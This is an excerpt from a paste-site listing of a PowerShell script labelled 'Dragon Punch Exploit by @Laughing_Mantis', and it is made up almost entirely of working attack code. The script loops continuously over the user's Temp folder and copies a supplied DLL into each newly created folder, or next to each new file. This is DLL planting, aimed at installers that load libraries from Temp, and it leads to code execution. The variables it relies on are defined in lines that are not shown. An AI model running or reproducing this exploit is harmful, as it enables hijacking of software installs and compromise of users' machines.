 432. if (!(Test-Path $DLL))
 433. {
 434.     throw "Error: $DLL does not exist."  
 435. }
 436.  
 437. $Path="$Env:USERPROFILE\AppData\Local\Temp\"
 438.  
 439. if (!(Test-Path $Path))
 440. {
 441.     throw "Error: $Path does not exist."
 442. }
 443.  
 444. [void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
 445.  
 446. $objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
 447.  
 448. $MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
 449. $objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
 450. $objNotifyIcon.BalloonTipIcon = "Info"
 451. $objNotifyIcon.BalloonTipText = "Monitoring the Folder: $Path to drop: $Target"
 452. $objNotifyIcon.BalloonTipTitle = "Dragon Punch Exploit by @Laughing_Mantis"
 453.  
 454. $objNotifyIcon.Visible = $True
 455. $objNotifyIcon.ShowBalloonTip(8000)
 456.  
 457.  
 458.  
 459. $GetFileList = {Get-ChildItem  -LiteralPath $Path -Filter * -Recurse -Force}
 460.  
 461. Write-Host "Getting initial list of files at $Path" -ForegroundColor Green
 462. $OldFileList = @(. $GetFileList)
 463. do
 464. {
 465.     $NewFileSet = @(. $GetFileList)
 466.     Compare-Object -ReferenceObject $OldFileList -DifferenceObject $NewFileSet -Property Name, CreationTime -PassThru |
 467.         Where-Object { $_.SideIndicator -eq '=>' } |
 468.             ForEach-Object {
 469.                 if (Test-Path $_.FullName -PathType Container)
 470.                 {
 471.                     $Victim = $_.FullName + "\"
 472.                     Write-Host "Detected new folder: $Victim" -ForegroundColor Red
 473.                     Copy-Item $DLL $($Victim + "\" + $Target) -Force
 474.                     Write-Host "Dropped $Target @ $Victim" -ForegroundColor Red
 475.                 }
 476.                 else
 477.                 {
 478.                     $Victim = Split-Path $_.FullName -Leaf  
 479.                     if (!($Victim.Equals($Target)))
 480.                     {
 481.                         $Victim = Split-Path $_.FullName -Parent
 482.                         Write-Host "Detected new file: $($_.FullName)" -ForegroundColor Red
 483.                         Copy-Item $DLL $($Victim + "\" + $Target) -Force
 484.                         Write-Host "Dropped $Target @ $Victim" -ForegroundColor Red
 485.                     }
 486.                 }
 487.             }
 488.  
 489.     $OldFileList = $NewFileSet
 490.     Start-Sleep -MilliSeconds $Interval
 491.    
 492. }
 493. while($true)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement